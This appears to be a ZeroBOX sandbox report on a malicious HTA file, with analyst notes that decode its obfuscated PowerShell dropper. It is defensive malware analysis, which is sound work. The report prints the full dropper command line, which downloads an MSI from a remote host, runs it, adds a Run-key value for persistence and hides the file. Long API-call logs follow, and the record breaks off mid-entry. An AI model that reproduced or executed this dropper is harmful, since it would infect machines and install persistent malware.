Summary | ZeroBOX

es.hta

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 24, 2024, 7:18 p.m. Nov. 24, 2024, 7:21 p.m.
Size 21.6KB
Type HTML document, ASCII text, with very long lines
MD5 10184fe59d8f1d9d1f50d9e373f1c007
SHA256 8bf7d79425114140c858c24114586ac08a9688e4f23b32e95533c97c89b99643
CRC32 2C1EDD57
ssdeep 384:CcxhZ9NREaeBiDepANfCTN8WQ+t6pZRXhQZzWC:NZ9NREae9ANfCTN8WQ+kpZ5hUzZ
Yara None matched — on the HTA itself only. The second-stage ONHQNHFT.msi was never retrieved in this run (the download failed at DNS resolution, see the console output below), so no payload was available to scan; a clean Yara result here says nothing about the dropped file.

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\es.hta

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa 
$iEiUK;;;;}paTeG;

      2092

Analyst note (decoded from the command line above, left byte-for-byte intact so it still matches IOC/hash lookups): every string in the PowerShell is an integer array passed to bShFjqP, which subtracts 4198 from each element and casts the result to [char]. Decoding gives: Net.WebClient (the downloader), the payload URL hxxps://pub-37d3986658af451c9d52bb9f482b3e2d[.]r2[.]dev/ONHQNHFT.msi (the same host as the failed lookup in the console output further down), the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, the file attribute Hidden, the suffix .dll and the string rundll32.exe. paTeG therefore: downloads the .msi, writes it to %APPDATA%\ONHQNHFT.msi, launches it with Start-Process (rundll32.exe is used only when the name ends in .dll), registers the path under the HKCU Run key as value name 'iJOtPBQ', and sets the Hidden attribute on it. In this run the download returned nothing, so the write and launch failed; the Run-key write does not depend on the file existing, and this excerpt shows no registry events either way, so check the full behavioral log before concluding persistence was not set. Detection: mshta.exe spawning powershell.exe with -ExecutionPolicy UnRestricted (not a security boundary, it only suppresses the script-signing check) and an inline script consisting of long integer arrays is the hunt signal here.

IP Address Status Action
164.124.101.2 Active Moloch — the only endpoint contacted; presumably the resolver that answered the failed lookup of the payload host (no HTTP/TLS traffic was ever sent) — TODO confirm from the pcap.

Suricata Alerts

No Suricata Alerts — not evidence of benign behavior: the only network activity was a failed DNS lookup for the payload host, so no payload traffic ever reached the IDS.

Suricata TLS

No Suricata TLS — no TLS session was established; WebClient.DownloadData failed at name resolution before any handshake could occur.

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

Analyst note: the assignment [Net.ServicePointManager]::SecurityProtocol = TLS12 failed because the .NET runtime loaded by PowerShell on this Win7 guest only exposes the Ssl3 and Tls enum members (Tls12 exists from .NET Framework 4.5 on — TODO confirm the installed version on s1_win7_x6403_us). The error is non-terminating, so the script kept running. On a host with a current .NET/PowerShell this line succeeds and the download proceeds, so the failure here is an artifact of the analysis VM, not of the sample.

WriteConsoleW

buffer: At line:1 char:1096
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $Ag
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: MxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,43
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 06,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,42
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: 49,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: )), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: 4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: .Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};func
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: tion CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]:: <<<< Sec
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: urityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: ($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUk
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: G=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)}
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: ;return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQt
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: ta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: 44,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PN
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: jTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: ;}paTeG;
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: ot be resolved: 'pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev'"
console_handle: 0x000001c3
1 1 0

Analyst note: the guest could not resolve the payload host, so DownloadData threw and CBgQtta returned $null; the WriteAllBytes "Value cannot be null" error further down is the direct consequence. No second-stage artifact exists in this run — the .msi was never written to %APPDATA% — so everything after that point in paTeG (launch, Run-key write, Hidden attribute) was executed against a path that does not exist and should be re-examined in a run with working name resolution.

WriteConsoleW

buffer: At line:1 char:1178
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $Ag
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: MxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,43
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: 06,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,42
console_handle: 0x000001f3
1 1 0

WriteConsoleW

buffer: 49,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP
console_handle: 0x0000020b
1 1 0

WriteConsoleW

buffer: )), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,
console_handle: 0x00000247
1 1 0

WriteConsoleW

buffer: 4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH
console_handle: 0x00000253
1 1 0

WriteConsoleW

buffer: .Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};func
console_handle: 0x0000025f
1 1 0

WriteConsoleW

buffer: tion CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285
console_handle: 0x0000026b
1 1 0

WriteConsoleW

buffer: ,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityP
console_handle: 0x00000277
1 1 0

WriteConsoleW

buffer: rotocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData <<<<
console_handle: 0x00000283
1 1 0

WriteConsoleW

buffer: ($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUk
console_handle: 0x0000028f
1 1 0

WriteConsoleW

buffer: G=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)}
console_handle: 0x0000029b
1 1 0

WriteConsoleW

buffer: ;return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQt
console_handle: 0x000002a7
1 1 0

WriteConsoleW

buffer: ta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,
console_handle: 0x000002b3
1 1 0

WriteConsoleW

buffer: 44,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PN
console_handle: 0x000002e3
1 1 0

WriteConsoleW

buffer: jTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;
console_handle: 0x000002ef
1 1 0

WriteConsoleW

buffer: ;}paTeG;
console_handle: 0x000002fb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000307
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000313
1 1 0

WriteConsoleW

buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000027
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f9b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02871000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02872000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
